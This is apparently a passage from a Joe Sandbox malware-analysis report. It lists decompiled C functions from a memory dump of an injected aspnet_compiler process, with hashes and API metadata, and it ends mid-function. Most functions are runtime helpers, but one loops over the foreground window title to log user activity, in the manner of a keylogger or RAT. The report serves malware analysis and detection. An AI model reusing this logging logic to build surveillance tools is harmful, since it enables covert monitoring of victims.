                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                • Instruction ID: 2e0d047c9ab5e1f9e195ebe2db35710396bb8e1c860b674ed94f75fdd8067eee
                • Opcode Fuzzy Hash: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                • Instruction Fuzzy Hash: 26A138B19006869FFB21CF18C8917BEBBA1EF15314F18416FE885AB381CA7C9946C759
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004410D1(void* _a4, intOrPtr* _a8) {
                				char _v5;
                				intOrPtr _v12;
                				char _v16;
                				signed int _t44;
                				char _t47;
                				intOrPtr _t50;
                				signed int _t52;
                				signed int _t56;
                				signed int _t57;
                				void* _t59;
                				signed int _t63;
                				signed int _t65;
                				char _t67;
                				intOrPtr* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t75;
                				void* _t76;
                				void* _t77;
                				signed int _t80;
                				intOrPtr _t82;
                				void* _t86;
                				signed int _t87;
                				void* _t89;
                				signed int _t91;
                				intOrPtr* _t98;
                				void* _t101;
                				intOrPtr _t102;
                				intOrPtr _t103;
                
                				_t101 = _a4;
                				if(_t101 != 0) {
                					_t80 = 9;
                					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                					_t98 = _a8;
                					__eflags = _t98;
                					if(_t98 != 0) {
                						_t82 =  *((intOrPtr*)(_t98 + 4));
                						_t47 =  *_t98;
                						_v16 = _t47;
                						_v12 = _t82;
                						__eflags = _t82 - 0xffffffff;
                						if(__eflags > 0) {
                							L7:
                							_t89 = 7;
                							__eflags = _t82 - _t89;
                							if(__eflags < 0) {
                								L12:
                								_v5 = 0;
                								_t50 = E0044121E(_t82, __eflags,  &_v16,  &_v5);
                								_t75 = _v16;
                								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                								_t52 = E00455E40(_t75, _v12, 0x15180, 0);
                								 *(_t101 + 0x1c) = _t52;
                								_t86 = 0x45d2a0;
                								_t76 = _t75 - _t52 * 0x15180;
                								asm("sbb eax, edx");
                								__eflags = _v5;
                								if(_v5 == 0) {
                									_t86 = 0x45d26c;
                								}
                								_t91 =  *(_t101 + 0x1c);
                								_t56 = 1;
                								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                									L16:
                									_t57 = _t56 - 1;
                									 *(_t101 + 0x10) = _t57;
                									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                									_t59 = E00455E40( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                									_t87 = 7;
                									asm("cdq");
                									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                									_t63 = E00455E40(_t76, _v12, 0xe10, 0);
                									 *(_t101 + 8) = _t63;
                									_t77 = _t76 - _t63 * 0xe10;
                									asm("sbb edi, edx");
                									_t65 = E00455E40(_t77, _v12, 0x3c, 0);
                									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                									 *(_t101 + 4) = _t65;
                									_t67 = 0;
                									__eflags = 0;
                									 *_t101 = _t77 - _t65 * 0x3c;
                									L17:
                									return _t67;
                								} else {
                									do {
                										_t56 = _t56 + 1;
                										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                									goto L16;
                								}
                							}
                							if(__eflags > 0) {
                								L10:
                								_t68 = E0043EEAD();
                								_t102 = 0x16;
                								 *_t68 = _t102;
                								L11:
                								_t67 = _t102;
                								goto L17;
                							}
                							__eflags = _t47 - 0x934126cf;
                							if(__eflags <= 0) {
                								goto L12;
                							}
                							goto L10;
                						}
                						if(__eflags < 0) {
                							goto L10;
                						}
                						__eflags = _t47 - 0xffff5740;
                						if(_t47 < 0xffff5740) {
                							goto L10;
                						}
                						goto L7;
                					}
                					_t69 = E0043EEAD();
                					_t102 = 0x16;
                					 *_t69 = _t102;
                					E0043A5BB();
                					goto L11;
                				}
                				_t71 = E0043EEAD();
                				_t103 = 0x16;
                				 *_t71 = _t103;
                				E0043A5BB();
                				return _t103;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                • Instruction ID: 551359a9c080faf0a086328dfaf192d0d3c69e8e99468298c70d0e4e8f2cce1c
                • Opcode Fuzzy Hash: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                • Instruction Fuzzy Hash: 47413A71A00704EFE7249F79CC42BAA7BA9EB8C714F10462FF101DB291D779A9818784
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00409A7A() {
                				char _v2004;
                				char _v2012;
                				char _v2028;
                				void* _v2036;
                				char _v2056;
                				void* _v2060;
                				char _v2080;
                				void* _v2084;
                				void* _t15;
                				signed int _t17;
                				void* _t29;
                				void* _t31;
                				void* _t33;
                				void* _t34;
                				void* _t57;
                				void* _t61;
                				signed int _t62;
                				signed int _t63;
                				void* _t64;
                				void* _t65;
                				void* _t66;
                				void* _t67;
                				void* _t68;
                
                				_t63 = _t62 & 0xfffffff8;
                				_t69 = _t63;
                				_t64 = _t63 - 0x81c;
                				_push(_t33);
                				_t59 = _t34;
                				_t61 = _t34 + 0x60;
                				while(1) {
                					E00435760(_t57,  &_v2004, 0, 0x7d0);
                					_t65 = _t64 + 0xc;
                					while(1) {
                						_t15 = E00401F8B(E00401E45(0x473298, _t55, _t61, _t69, 0x2a));
                						_t66 = _t65 - 0x18;
                						E0040415E(_t33, _t66, _t55, _t61, _t15);
                						_t17 = E0041AECA( &_v2012, _t55);
                						_t65 = _t66 + 0x18;
                						_t69 = _t17;
                						if(_t17 != 0) {
                							break;
                						}
                						Sleep(0x1f4);
                					}
                					_t55 = E004042DC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040415E(_t33,  &_v2028, _t55, _t61,  &_v2004));
                					E00401EF3(_t59 + 4, _t20, _t59, E00402FF4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					_t67 = _t65 - 0x18;
                					E004086D0(_t33, _t67, _t55, __eflags, _t61);
                					E0040977E(_t59, _t55);
                					while(1) {
                						_t29 = E00401F8B(E00401E45(0x473298, _t55, _t61, __eflags, 0x2a));
                						_t68 = _t67 - 0x18;
                						E0040415E(_t33, _t68, _t55, _t61, _t29);
                						_t31 = E0041AECA(0, _t55);
                						_t64 = _t68 + 0x18;
                						__eflags = _t31;
                						if(__eflags == 0) {
                							break;
                						}
                						Sleep(0x64);
                					}
                					E0040A64F(_t33, _t59, _t55);
                				}
                			}

                APIs
                  • Part of subcall function 0041AECA: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                  • Part of subcall function 0041AECA: GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                  • Part of subcall function 0041AECA: GetWindowTextW.USER32 ref: 0041AF0D
                • Sleep.KERNEL32(000001F4), ref: 00409AD5
                • Sleep.KERNEL32(00000064), ref: 00409B70
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$SleepText$ForegroundLength
                • String ID: [ $ ]
                • API String ID: 3309952895-93608704
                • Opcode ID: f41b57c652dca7258540d8898ca8d490b9a32e46edb9ec1ddae85787edb7c504
                • Instruction ID: c75d603df524a244733055fbd34c65f055766319f874fab2ee06841349c314ac
                • Opcode Fuzzy Hash: f41b57c652dca7258540d8898ca8d490b9a32e46edb9ec1ddae85787edb7c504
                • Instruction Fuzzy Hash: 9821AE3160420057C608BB76DC179AE76A99F91308F40057FF952771D3EE7DAA09869F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00442303(signed int __eax, void* __ecx) {
                				signed int _t2;
                				signed int _t3;
                				int _t10;
                				int _t11;
                				void* _t13;
                				short** _t16;
                				char* _t19;
                				void* _t20;
                
                				_t13 = __ecx;
                				_t16 =  *0x4704e4; // 0x13fb350
                				if(_t16 != 0) {
                					_t10 = 0;
                					while( *_t16 != _t10) {
                						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                						_t11 = _t2;
                						if(_t11 == 0) {
                							L11:
                							_t3 = _t2 | 0xffffffff;
                						} else {
                							_t19 = E004443F4(_t13, _t11, 1);
                							_pop(_t13);
                							if(_t19 == 0) {
                								L10:
                								_t2 = E00445002(_t19);
                								goto L11;
                							} else {
                								_t10 = 0;
                								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                									goto L10;
                								} else {
                									_push(0);
                									_push(_t19);
                									E0044E33F();
                									E00445002(0);
                									_t20 = _t20 + 0xc;
                									_t16 =  &(_t16[1]);
                									continue;
                								}
                							}
                						}
                						L9:
                						return _t3;
                						goto L12;
                					}
                					_t3 = 0;
                					goto L9;
                				} else {
                					return __eax | 0xffffffff;
                				}
                				L12:
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                • Instruction ID: 928698612f51615fe1cf777c5292d1b4e42623037d2c96bc68a693b0eec0e686
                • Opcode Fuzzy Hash: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                • Instruction Fuzzy Hash: 3F01A7B26096167EFA201E797DC1F6B221DDF917B9B70033BF921612D5DBAC8C014168
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00442382(signed int __eax, void* __ecx) {
                				signed int _t2;
                				signed int _t3;
                				int _t10;
                				int _t11;
                				void* _t13;
                				char** _t16;
                				short* _t19;
                				void* _t20;
                
                				_t13 = __ecx;
                				_t16 =  *0x4704e0; // 0x13f4478
                				if(_t16 != 0) {
                					_t10 = 0;
                					while( *_t16 != _t10) {
                						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                						_t11 = _t2;
                						if(_t11 == 0) {
                							L11:
                							_t3 = _t2 | 0xffffffff;
                						} else {
                							_t19 = E004443F4(_t13, _t11, 2);
                							_pop(_t13);
                							if(_t19 == 0) {
                								L10:
                								_t2 = E00445002(_t19);
                								goto L11;
                							} else {
                								_t10 = 0;
                								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                									goto L10;
                								} else {
                									_push(0);
                									_push(_t19);
                									E0044E34A(_t13);
                									E00445002(0);
                									_t20 = _t20 + 0xc;
                									_t16 =  &(_t16[1]);
                									continue;
                								}
                							}
                						}
                						L9:
                						return _t3;
                						goto L12;
                					}
                					_t3 = 0;
                					goto L9;
                				} else {
                					return __eax | 0xffffffff;
                				}
                				L12:
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                • Instruction ID: ffef20b579aa455cdcb3ec38d6af2d4eff98cb77a0cb65f0443bbc9c4ef6001c
                • Opcode Fuzzy Hash: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                • Instruction Fuzzy Hash: 5101D6B22096127FF6211E797CC1D2B232DEF513BA365033BF921512D5DAACCC444168
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00409BE8(void* __ecx, char* __edx) {
                				void* __ebx;
                				int _t9;
                				long _t14;
                				char* _t22;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t30;
                
                				_t22 = __edx;
                				_t9 =  *0x4730e8 |  *0x4730ec;
                				_t24 = __ecx;
                				if(_t9 != 0) {
                					 *((char*)(__ecx + 0x39)) = 0;
                					do {
                						_t9 = CreateFileW(E00401EE4(0x4730a0), 0x80000000, 7, 0, 3, 0x80, 0);
                						_t23 = _t9;
                						if(_t23 == 0xffffffff) {
                							 *((char*)(_t24 + 0x39)) = 0;
                						} else {
                							_t14 = GetFileSize(_t23, 0);
                							_t30 = 0 -  *0x4730ec;
                							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x4730e8)) {
                								 *((char*)(_t24 + 0x39)) = 1;
                								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                									E0040A64F(0, _t24, _t22);
                								}
                								Sleep(0x2710);
                							}
                							_t9 = CloseHandle(_t23);
                						}
                					} while ( *((char*)(_t24 + 0x39)) == 1);
                					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                						_t35 =  *0x46f9d4 - 0x31;
                						if( *0x46f9d4 == 0x31) {
                							E004086D0(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                							return E0040977E(_t24, _t22);
                						}
                					}
                				}
                				return _t9;
                			}

                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                • Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                • CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleSizeSleep
                • String ID:
                • API String ID: 1958988193-0
                • Opcode ID: 50d1c0447dad42618e748a365bc43df3760a561be73cff881b0354591b1b06b9
                • Instruction ID: 776417b5dd6b277b78666ee6a0049f3b3f0777a2ef627118506dbb8d74d8395d
                • Opcode Fuzzy Hash: 50d1c0447dad42618e748a365bc43df3760a561be73cff881b0354591b1b06b9
                • Instruction Fuzzy Hash: 2C11EB306487C07AF721AB34A8C9A2F3ADEA745705F04447FF187661D3C6799D84831D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00446DE6(signed int _a4) {
                				signed int _t9;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x470668 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x45cc40 + _t9 * 4);
                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0xd60a1516
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue), ref: 00446E18
                • GetLastError.KERNEL32(?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000,00000364,?,00446B67), ref: 00446E24
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000), ref: 00446E32
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                • Instruction ID: 7cfac10879522bcf09d0363c87617103b1842d1ca64a55dff1d48b8732c2297d
                • Opcode Fuzzy Hash: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                • Instruction Fuzzy Hash: 7901F73A2063229BD7214B79EC44A573BD9AF06F62B320231F91AD7241D724D801C6ED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041ADFE(void* __edx) {
                				long _v12;
                				void* __ebx;
                				void* __ecx;
                				void* __edi;
                				void* __ebp;
                				struct _OVERLAPPED* _t12;
                				WCHAR* _t13;
                				void* _t17;
                				long _t19;
                				void* _t21;
                
                				_t12 = 0;
                				_t21 = __edx;
                				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
                				if(_t17 != 0xffffffff) {
                					_t19 = GetFileSize(_t17, 0);
                					E0040242E(0, _t21, _t17, _t21, _t19, 0);
                					_v12 = 0;
                					if(ReadFile(_t17, E00401F8B(_t21), _t19,  &_v12, 0) != 0) {
                						_t12 = 1;
                					}
                					CloseHandle(_t17);
                					return _t12;
                				}
                				return 0;
                			}














                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041AE2B
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041AE50
                • CloseHandle.KERNEL32(00000000), ref: 0041AE5E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleReadSize
                • String ID:
                • API String ID: 3919263394-0
                • Opcode ID: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                • Instruction ID: 3f0c34db4874b28da9e92ecf7e139d0848c3339cd4cea530d57336cc45ca2017
                • Opcode Fuzzy Hash: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                • Instruction Fuzzy Hash: 1BF0C2B52462087FE6111B21BC84FBF379CDB867A9F10067EFD02A22C1CA658D054536
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E00438160(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t25;
                				void* _t27;
                				void* _t28;
                				void* _t29;
                				intOrPtr _t30;
                				intOrPtr* _t32;
                				void* _t34;
                
                				_t29 = __edx;
                				_t27 = __ebx;
                				_t36 = _a28;
                				_t30 = _a8;
                				if(_a28 != 0) {
                					_push(_a28);
                					_push(_a24);
                					_push(_t30);
                					_push(_a4);
                					E004387AF(_t36);
                					_t34 = _t34 + 0x10;
                				}
                				_t37 = _a40;
                				_push(_a4);
                				if(_a40 != 0) {
                					_push(_a40);
                				} else {
                					_push(_t30);
                				}
                				E00437C87(_t28);
                				_t32 = _a32;
                				_push( *_t32);
                				_push(_a20);
                				_push(_a16);
                				_push(_t30);
                				E004389B1(_t27, _t28, _t29, _t30, _t37);
                				_push(0x100);
                				_push(_a36);
                				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                				_push( *((intOrPtr*)(_a24 + 0xc)));
                				_push(_a20);
                				_push(_a12);
                				_push(_t30);
                				_push(_a4);
                				_t25 = E00437F6A(_t29, _t32, _t37);
                				if(_t25 != 0) {
                					E00437C55(_t25, _t30);
                					return _t25;
                				}
                				return _t25;
                			}














                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 00438177
                  • Part of subcall function 004387AF: ___AdjustPointer.LIBCMT ref: 004387F9
                • _UnwindNestedFrames.LIBCMT ref: 0043818E
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004381A0
                • CallCatchBlock.LIBVCRUNTIME ref: 004381C4
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                • Instruction ID: b80c8dfee50a01e3efcc98067a7db4f6d443bb63a6d24abc5b8fd2fcc045c81f
                • Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                • Instruction Fuzzy Hash: F1011732000209BBCF125F56CC01EEB7BBAFF4C714F14511AF95866220D73AE8629BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00417F42(intOrPtr _a4, intOrPtr _a8) {
                				int _v4;
                				void* __ecx;
                				int _t9;
                				void* _t13;
                				int _t26;
                				int _t29;
                
                				_t9 = GetSystemMetrics(0x4c);
                				_t26 = GetSystemMetrics(0x4d);
                				_t29 = GetSystemMetrics(0x4e);
                				_v4 = GetSystemMetrics(0x4f);
                				if(_t9 < 0) {
                					_a4 = _a4 + E00417482();
                				}
                				if(_t26 < 0) {
                					_a8 = _a8 + E00417482();
                				}
                				_t13 = E00417FA9(_a4, _t29);
                				E00417FA9(_a8, _v4);
                				return _t13;
                			}










                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: MetricsSystem
                • String ID:
                • API String ID: 4116985748-0
                • Opcode ID: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                • Instruction ID: db9294b6453bfed66dbe03807c9cf0078fbbbbfeeb63ddf2ed7e0e7c3359cc27
                • Opcode Fuzzy Hash: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                • Instruction Fuzzy Hash: 85F0AFB1B483165FD700EFB69C45A6B7AE59BD42A4F10043FF608C7281EEACDC458B84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00437801() {
                				void* _t4;
                				void* _t8;
                
                				E00438C10();
                				E00437795();
                				if(E00438D37() != 0) {
                					_t4 = E00438CE9(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00438D73();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}






                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00437801
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00437806
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043780B
                  • Part of subcall function 00438D37: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00438D48
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00437820
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                • Instruction ID: 44b38c586fa46ca64db38af4dc09b646a72d0231a99fa094af013a7d49b3c72a
                • Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                • Instruction Fuzzy Hash: 5DC00298409781141D383A7311461AE93002C6E3CDF8078DFFAE0175435D0E140B957E
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __startOneArgErrorHandling.LIBCMT ref: 004415BD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorHandling__start
                • String ID: pow
                • API String ID: 3213639722-2276729525
                • Opcode ID: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                • Instruction ID: 9bdf7c23e7d16313cb1f45f597b7cc27bb5148f7337d60067ed22a22280059c4
                • Opcode Fuzzy Hash: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                • Instruction Fuzzy Hash: C4514C61E06201A7F7517714C9813BB2B94DB80741F28896BF0D6823BAEB3DCCD59E4E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00420387(void* __ecx) {
                				signed int _t92;
                				signed int _t93;
                				intOrPtr _t94;
                				signed int _t95;
                				signed int _t96;
                				void* _t100;
                				signed int _t124;
                				signed int _t130;
                				signed int _t134;
                				void* _t142;
                				signed int _t148;
                				void* _t151;
                				signed int _t153;
                				signed int _t154;
                				signed int _t162;
                				signed int _t165;
                				signed int _t166;
                				signed int _t169;
                				signed int _t172;
                				signed int _t174;
                				signed int _t175;
                				signed int* _t177;
                				signed int* _t178;
                				signed int* _t179;
                				signed int* _t180;
                
                				 *_t177 =  *_t177 & 0x00000000;
                				_t142 = __ecx;
                				_t92 =  *(__ecx + 0x310) & 0x0000ffff;
                				if((_t92 & 0x00000004) == 0) {
                					if((_t92 & 0x00001000) == 0) {
                						goto L1;
                					}
                					_t94 =  *((intOrPtr*)(__ecx + 8));
                					if(_t94 == 0) {
                						L26:
                						_t93 = 0xffffff53;
                						L27:
                						return _t93;
                					}
                					_t95 = _t94 + 0x54;
                					_t177[6] = _t95;
                					if(_t95 == 0) {
                						goto L26;
                					}
                					_push( &(_t177[3]));
                					_t96 = E0042035E(_t95, 0x20);
                					_t169 = _t177[4];
                					_t148 = 0xb;
                					_t165 = _t96 % _t148;
                					_t177[7] = _t165;
                					if(_t169 == 0) {
                						if(E00432AE1(0x474a44) == 0) {
                							_t174 = 0;
                							_t166 = _t165 * 0x170;
                							_t177[5] = 0;
                							_t16 = _t166 + 0x473990; // 0x473990
                							_t99 = _t16;
                							_t177[6] = _t16;
                							while(1) {
                								_t100 = E004358BA(_t177[9], _t99, 0x20);
                								_t177 =  &(_t177[3]);
                								if(_t100 == 0) {
                									break;
                								}
                								_t174 = _t174 + 1;
                								_t99 = _t177[6] + 0x78;
                								_t177[5] = _t174;
                								_t177[6] = _t177[6] + 0x78;
                								if(_t174 < 3) {
                									continue;
                								}
                								_t174 =  *(_t166 + 0x473980);
                								_t177[5] = _t174;
                								 *(_t166 + 0x473980) = _t174 + 1;
                								break;
                							}
                							_t175 = _t174 * 0x78;
                							_push(0x30);
                							if( *(_t142 + 0x310) < 0x8000) {
                								_push( *((intOrPtr*)(_t142 + 8)) + 0xa5);
                								_t32 = _t166 + 0x4739b1; // 0x4739b1
                								_push(_t32 + _t175);
                								E004351E0();
                								 *((char*)(_t166 + _t175 + 0x4739b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x74));
                							} else {
                								_push(_t142 + 0x199);
                								_t28 = _t166 + 0x4739b1; // 0x4739b1
                								_push(_t28 + _t175);
                								E004351E0();
